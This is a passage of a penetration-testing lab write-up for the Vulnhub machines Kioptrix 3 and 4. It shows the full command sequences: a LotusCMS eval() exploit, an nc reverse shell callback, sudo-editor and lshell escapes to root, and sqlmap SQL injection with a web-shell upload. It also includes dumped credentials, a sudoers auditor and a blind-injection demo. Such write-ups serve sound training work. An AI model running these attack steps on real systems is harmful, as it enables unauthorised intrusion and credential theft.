   ----                              ---------------  ----       -----------
   exploit/multi/http/lcms_php_exec  2011-03-03       excellent  LotusCMS 3.0 eval() Remote Command Execution
 
</pre><p>Use the module against the target. The first run below fails only because RHOST was mistyped as <code>192.168.43.58</code>; with the correct address, <code>192.168.43.158</code>, the module finds the injectable <code>page</code> parameter and opens a bind shell:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > show options 
 
Module options (exploit/multi/http/lcms_php_exec):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0
 
 
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.58
RHOST => 192.168.43.58
msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp 
PAYLOAD => generic/shell_bind_tcp
msf exploit(multi/http/lcms_php_exec) > set URI /
URi => /
msf exploit(multi/http/lcms_php_exec) > show options 
 
Module options (exploit/multi/http/lcms_php_exec):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.43.58    yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /                yes       URI
   VHOST                     no        HTTP server virtual host
 
 
Payload options (generic/shell_bind_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.58    no        The target address
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0
 
 
msf exploit(multi/http/lcms_php_exec) > run 
 
[*] Started bind handler
[-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.43.58:80) was unreachable.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.158
RHOST => 192.168.43.158
msf exploit(multi/http/lcms_php_exec) > run 
 
[*] Started bind handler
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.43.177:44505 -> 192.168.43.158:4444) at 2018-05-08 10:02:56 -0400
 
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php
pwd 
/home/www/kioptrix3.com
</pre><p><code>cd gallery</code> does not work in this shell, so list the directory with <code>ls -l gallery</code> instead:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">ls -l gallery
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php
</pre><p>There is a <code>gconfig.php</code> configuration file; <code>cat</code> it to read the database credentials. The gallery connects to MySQL as <code>root</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">  $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
 
    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
 
</pre><h3><a name='header-n10339' class='md-header-anchor '></a>lotusRCE.sh</h3><p>The same <code>eval()</code> injection can be exploited without Metasploit, using Hood3dRob1n's shell script. Read it before running it: it posts a PHP payload into the vulnerable parameter and, on success, spawns a reverse shell with the netcat variant you pick.</p><pre class="md-fences mock-cm md-end-block" lang="">wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
</pre><p>Make it executable and run it against the target; it asks for the IP and port to call back to, then for the netcat variant to use:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# chmod +x lotusRCE.sh
root@kali:~# ./lotusRCE.sh 192.168.43.158
 
Path found, now to check for vuln....
 
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!
 
About to try and inject reverse shell....
what IP to use?
192.168.43.177
What PORT?
2333
 
OK, open your local listener and choose the method for back connect: 
1) NetCat -e        3) NetCat Backpipe  5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1
 
</pre><p>With a listener waiting on port 2333, option 1 (<code>nc -e</code>) connects back as <code>www-data</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:/tmp# nc -lvp 2333
listening on [any] 2333 ...
connect to [192.168.43.177] from kioptrix3.com [192.168.43.158] 56259
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
</pre><h2><a name='header-n10344' class='md-header-anchor '></a>Privilege escalation</h2><p>Try the credentials recovered from the SQL injection (the MD5 hashes were cracked to the values in parentheses):</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
</pre><p>Over SSH, the first account, <code>dreg</code>, logs in but is of little use and cannot escalate privileges. Log in as the second one:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
</pre><p>There is a <code>CompanyPolicy.README</code> file:</p><pre class="md-fences mock-cm md-end-block" lang="">loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
 
DG
CEO
</pre><p>The note tells staff to edit, create and view files with <code>sudo ht</code>, so the <code>ht</code> editor may be run as root. Any editor that runs as root can write arbitrary files, including <code>/etc/passwd</code> and <code>/etc/sudoers</code>, which is the escalation path here.</p><p>Try it from the Kali SSH session:</p><pre class="md-fences mock-cm md-end-block" lang="">loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
</pre><p>The error means the terminal type advertised by the Kali session, <code>xterm-256color</code>, has no terminfo entry on this old target. Setting a terminal type the target knows (<code>export TERM=xterm</code>) before <code>sudo ht</code> fixes it; connecting from a local <code>xshell</code> session, as done here, works as well.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_13.png' alt='' referrerPolicy='no-referrer' /></p><p>Press <code>F3</code> (open) and enter <code>/etc/passwd</code> or <code>/etc/sudoers</code> to edit that file.</p><p>In <code>/etc/passwd</code>, set the current user's UID and GID fields (the third and fourth colon-separated fields) to <code>0</code>, which makes the account equivalent to <code>root</code>:
<img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_14.png' alt='' referrerPolicy='no-referrer' /></p><p>Alternatively, give the current user the same <code>/etc/sudoers</code> entry as <code>root</code> (<code>loneferret ALL=(ALL) ALL</code>):
<img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_15.png' alt='' referrerPolicy='no-referrer' /></p><p>Log in again over SSH. With UID 0 in <code>/etc/passwd</code>, the same password now yields a root shell:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Last login: Tue May  8 19:27:01 2018 from uknow-pc
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)
root@Kioptrix3:~# whoami
root
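</pre><p>Before moving on, it is worth looking at what this escalation leaves behind. The Python below is an added example (not part of the write-up) from the defender's side: it parses <code>/etc/passwd</code> and <code>/etc/sudoers</code> and flags an extra UID-0 account, a new <code>ALL=(ALL) ALL</code> entry, and the root cause, an editor permitted through <code>sudo</code>. The file contents are constructed to match what the page describes, not copied from the VM, and <code>/usr/local/bin/ht</code> is an assumed path.</p><pre class="md-fences mock-cm md-end-block" lang="python">
```python
"""Detection-side counterpart of the `sudo ht` escalation.

Added example for this write-up, not part of the original. It audits the
two files the editor was used on: /etc/passwd (an extra UID-0 account) and
/etc/sudoers (a new ALL=(ALL) entry, and the root cause, an editor allowed
through sudo). The file contents below are constructed to match what the
page describes; they are not copied from the VM, and the path of ht on the
target is an assumption.
"""
import posixpath

# Commands that give arbitrary file write (or a shell) when run as root.
EDITOR_LIKE = frozenset({"ht", "vi", "vim", "nano", "ed", "less", "more", "emacs"})

PASSWD_TAMPERED = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/bin/sh
loneferret:x:0:0:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:dreg,,,:/home/dreg:/bin/bash
"""

SUDOERS_TAMPERED = """# constructed sample, not the VM's real sudoers
Defaults\tenv_reset
root\tALL=(ALL) ALL
loneferret\tALL=NOPASSWD: /usr/local/bin/ht
loneferret\tALL=(ALL) ALL
%admin\tALL=(ALL) ALL
"""


def uid0_accounts(passwd_text):
    """Every login name whose UID field is 0; only 'root' is expected."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[2] == "0":
            names.append(fields[0])
    return names


def sudoers_findings(sudoers_text):
    """Return {'full_access': [who], 'editors': [(who, command)]}.

    Handles the plain `who HOST=(RUNAS) CMD` form, with optional NOPASSWD:
    style tags and comma-separated command lists. Aliases and #include
    directives are out of scope for this example.
    """
    full_access, editors = [], []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or "=" not in parts[1]:
            continue
        who, spec = parts
        commands = spec.split("=", 1)[1]          # drop the HOST part
        if commands.startswith("("):
            commands = commands.split(")", 1)[1]  # drop the (RUNAS) part
        for cmd in commands.split(","):
            cmd = cmd.strip()
            for tag in ("NOPASSWD:", "PASSWD:", "SETENV:"):
                if cmd.startswith(tag):
                    cmd = cmd[len(tag):].strip()
            if cmd == "ALL":
                full_access.append(who)
            elif posixpath.basename(cmd.split()[0]) in EDITOR_LIKE:
                editors.append((who, cmd))
    return {"full_access": full_access, "editors": editors}


def audit(passwd_text, sudoers_text):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    for name in uid0_accounts(passwd_text):
        if name != "root":
            findings.append("uid 0 account other than root: " + name)
    sudo = sudoers_findings(sudoers_text)
    for who in sudo["full_access"]:
        if who != "root":
            findings.append("full sudo access: " + who)
    for who, cmd in sudo["editors"]:
        findings.append("editor or pager runnable as root via sudo: %s, %s" % (who, cmd))
    return findings


if __name__ == "__main__":
    for finding in audit(PASSWD_TAMPERED, SUDOERS_TAMPERED):
        print(finding)
```
</pre><p>The <code>%admin ALL=(ALL) ALL</code> line is Ubuntu's default and is flagged deliberately: membership of that group is exactly the route used on Kioptrix 4 later on this page.</p><pre class="md-fences mock-cm md-end-block" lang="" style="display:none">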
</pre><p>The session is now <code>root</code>.</p><h2><a name='header-n10381' class='md-header-anchor '></a>Summary</h2><p>This exercise was long and ran into several dead ends. First, having found <code>phpmyadmin</code>, I tried the MySQL log-writing trick to get a shell, but the <code>general_log</code> variable does not exist on this server: it only appeared in MySQL 5.1, and Ubuntu 8.04 ships 5.0.</p><p>Second, the SQL injection runs as <code>root</code> (DBA), so I tried <code>--os-shell</code> using the absolute path learned from the remote command execution, but the file could not be written; apparently a directory permission problem (MySQL writes files as the user mysqld runs as, so that user needs write access to the target directory, and on Ubuntu the mysqld AppArmor profile can deny writes outside MySQL's own directories with the same symptom).</p><p><code>INTO OUTFILE</code> from <code>phpmyadmin</code> fails the same way, with <code>#1 - Can't create/write to file</code>, and the command-execution shell also shows the directory is not writable.</p><p>Finally, I added the file-inclusion plus back-end-upload route, which includes an uploaded image containing PHP to get a shell. Contrived, but still a neat chain.</p><p>I wanted to try more approaches, but the lab environment is limited. Having done a few <code>vulnhub</code> machines now, I feel I have learned a lot, especially about privilege escalation.</p><p>These environments are sometimes unusual, even odd, but working through them fills in a good deal of <code>linux</code> knowledge I had been missing.</p><p> </p><h1><a name='header-n10396' class='md-header-anchor '></a>Chapter 16: Vulnhub penetration testing practice - Kioptrix 4</h1><hr /><p>title: Vulnhub penetration testing practice - Kioptrix 4
date: 2018-05-17 13:46:30
tags:</p><h2><a name='header-n10399' class='md-header-anchor '></a>Author: Ukonw</h2><p> </p><h3><a name='header-n10405' class='md-header-anchor '></a>Information gathering</h3><p>Port scan with <code>nmap</code>:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -sS -A 10.32.58.187
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-17 01:57 EDT
Nmap scan report for 10.32.58.187
Host is up (0.00037s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Host script results:
|_clock-skew: mean: 10h00m00s, deviation: 2h49m43s, median: 7h59m59s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-05-17T09:58:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 10.32.58.187
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
</pre><p>The scan shows the following open ports:</p><ul><li>22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)</li><li>80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)</li><li>139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</li><li>445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)</li></ul><p>Open the web service on port 80.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_1.png' alt='' referrerPolicy='no-referrer' /></p><p>The universal-password bypass <code>'or 1=1#</code> fails, and the weak pair <code>admin:admin</code> is wrong too.</p><p>Submitting <code>admin</code> with a single quote (<code>'</code>) as the password produces a MySQL error that discloses the script path <code>/var/www/checklogin.php</code>.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_2.png' alt='' referrerPolicy='no-referrer' /></p><p>So the login form has a POST-based SQL injection.</p><h2><a name='header-n10433' class='md-header-anchor '></a>Exploitation</h2><h3><a name='header-n10434' class='md-header-anchor '></a>SQL injection with sqlmap</h3><p><code>sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&amp;mypassword=123&amp;Submit=Login" -p mypassword --current-user --current-db --is-dba</code></p><p>When sqlmap asks whether to follow the <code>302</code> redirect, answer <code>n</code>.</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">sqlmap identified the following injection point(s) with a total of 253 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:00:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:00:45] [INFO] fetching current user
[02:00:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:00:45] [INFO] retrieved: root@localhost
current user:    'root@localhost'
[02:00:45] [INFO] fetching current database
[02:00:45] [INFO] retrieved: members
current database:    'members'
[02:00:45] [INFO] testing if current user is DBA
[02:00:45] [INFO] fetching current user
current user is DBA:    True
[02:00:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.32.58.187'
 
[*] shutting down at 02:00:45
</pre><p>The injection dumps the member table; the passwords are stored in clear text:</p><pre class="md-fences mock-cm md-end-block" lang="">Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
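</pre><p>sqlmap classified the injection as boolean-based blind, which means every byte is recovered through yes/no questions. As an added example (not sqlmap's or the author's code), the Python below rebuilds <code>checklogin.php</code> as a string-concatenated query over an in-memory SQLite copy of the <code>members</code> table and extracts a password with a seven-question binary search per character, beside the parameterised version that is immune. The login script's exact shape is an assumption; SQLite's <code>unicode()</code> and <code>-- </code> stand in for MySQL's <code>ascii()</code> and <code>#</code>.</p><pre class="md-fences mock-cm md-end-block" lang="python">
```python
"""Boolean-based blind extraction against checklogin.php, replayed offline.

Added example for this write-up, not the author's or sqlmap's code. The
members table and its two rows are taken from the sqlmap dump; the shape of
checklogin.php (a username/password equality lookup that succeeds when one
row matches) is an assumption based on the error and on sqlmap's payloads.
SQLite stands in for MySQL: ascii() becomes unicode() and '#' becomes '-- '.
"""
import sqlite3


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE members(id INTEGER, username TEXT, password TEXT);
        INSERT INTO members VALUES (1, 'john', 'MyNameIsJohn');
        INSERT INTO members VALUES (2, 'robert', 'ADGAdsafdfwt4gadfga==');
    """)
    return db


def vulnerable_checklogin(db, myusername, mypassword):
    """Login succeeds when exactly one row matches the concatenated query."""
    sql = ("SELECT * FROM members WHERE username='" + myusername +
           "' AND password='" + mypassword + "'")
    return len(db.execute(sql).fetchall()) == 1


def fixed_checklogin(db, myusername, mypassword):
    """Parameterised lookup; the quote in an injection payload is just data."""
    sql = "SELECT * FROM members WHERE username=? AND password=?"
    return len(db.execute(sql, (myusername, mypassword)).fetchall()) == 1


class BlindOracle:
    """Turns the login's true/false answer into a yes/no question about one
    character of a chosen user's password. Counts requests, as sqlmap does."""

    def __init__(self, db, target_user):
        self.db = db
        self.target_user = target_user
        self.requests = 0

    def char_in_range(self, pos, lo, hi):
        # AND binds tighter than OR, so the failed admin check is irrelevant
        # and the injected condition alone decides whether robert's row matches.
        payload = ("' OR (username='%s' AND unicode(substr(password,%d,1)) "
                   "BETWEEN %d AND %d)-- " % (self.target_user, pos, lo, hi))
        self.requests += 1
        return vulnerable_checklogin(self.db, "admin", payload)

    def extract_char(self, pos):
        """Binary search over ASCII 0..127: seven questions per character."""
        lo, hi = 0, 127
        for _ in range(7):
            mid = (lo + hi) // 2
            if self.char_in_range(pos, lo, mid):
                hi = mid
            else:
                lo = mid + 1
        return chr(lo)

    def extract_password(self, max_len=64):
        out = ""
        for pos in range(1, max_len + 1):
            # substr() past the end yields '', unicode('') is NULL: the probe fails.
            if not self.char_in_range(pos, 0, 127):
                break
            out += self.extract_char(pos)
        return out


def blind_dump(db, target_user):
    """Convenience wrapper returning (password, number of requests used)."""
    oracle = BlindOracle(db, target_user)
    return oracle.extract_password(), oracle.requests


if __name__ == "__main__":
    db = build_db()
    password, requests = blind_dump(db, "robert")
    print("robert:", password, "recovered in", requests, "requests")
    print("fixed login accepts an injection payload?",
          fixed_checklogin(db, "admin", "' OR username='robert'-- "))
```
</pre><p>Request count is the practical cost: the 21 characters of robert's password take 169 requests at one yes/no answer each, which is why sqlmap warns about single-threaded retrieval in its output above.</p><pre class="md-fences mock-cm md-end-block" lang="" style="display:none">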
 
</pre><p>Use <code>--os-shell</code> to drop a web shell. This works here because the DBMS runs as <code>root</code>, the document root <code>/var/www</code> was disclosed by the error message, and mysqld is able to write there:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --os-shell
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting at 02:09:06
 
[02:09:06] [INFO] resuming back-end DBMS 'mysql' 
[02:09:06] [INFO] testing connection to the target URL
[02:09:06] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:09:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:09:06] [INFO] going to use a web backdoor for command prompt
[02:09:06] [INFO] fingerprinting the back-end DBMS operating system
[02:09:06] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[02:09:08] [INFO] retrieved the web server document root: '/var/www'
[02:09:08] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[02:09:08] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[02:09:08] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpuadle.php
[02:09:08] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[02:09:08] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] 
[02:09:09] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpbcphh.php
[02:09:09] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:    'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:    'www-data'
os-shell> cat checklogin.php
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:
---
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
</pre><p>The web shell runs as <code>www-data</code>, with few privileges, but <code>checklogin.php</code> gives away the database credentials: <code>root</code> with an empty password.</p><h3><a name='header-n10448' class='md-header-anchor '></a>Connecting over SSH</h3><p>Log in over SSH with the user name and password obtained from the SQL injection:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh john@10.32.58.187
The authenticity of host '10.32.58.187 (10.32.58.187)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.32.58.187' (RSA) to the list of known hosts.
john@10.32.58.187's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ help help
Limited Shell (lshell) limited help.
Cheers.
</pre><p>The restricted shell (<code>lshell</code>) only allows these commands:</p><pre class="md-fences mock-cm md-end-block" lang="">cd  clear  echo  exit  help  ll  lpath  ls
</pre><p>The important one is <code>echo</code>. This lshell version has a well-known escape: the text given to <code>echo</code> ends up being evaluated by the Python interpreter that runs lshell, so <code>os.system('/bin/bash')</code> is enough to get an interactive <code>bash</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">john:~$ echo os.system('/bin/bash')     
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
</pre><p>The shell is still only <code>john</code>'s.</p><h3><a name='header-n10463' class='md-header-anchor '></a>Privilege escalation through MySQL</h3><p>Log in to MySQL with the database credentials found in <code>checklogin.php</code> (<code>root</code>, empty password):</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">john@Kioptrix4:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3520
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
 
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
 
mysql> status;
--------------
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
 
Connection id:      3520
Current database:   
Current user:       root@localhost
SSL:            Not in use
Current pager:      stdout
Using outfile:      ''
Using delimiter:    ;
Server version:     5.0.51a-3ubuntu5.4 (Ubuntu)
Protocol version:   10
Connection:     Localhost via UNIX socket
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
UNIX socket:        /var/run/mysqld/mysqld.sock
Uptime:         1 hour 10 min 47 sec
</pre><p>Try MySQL UDF privilege escalation. For comparison, on Windows the sequence is:</p><pre class="md-fences mock-cm md-end-block" lang="">USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
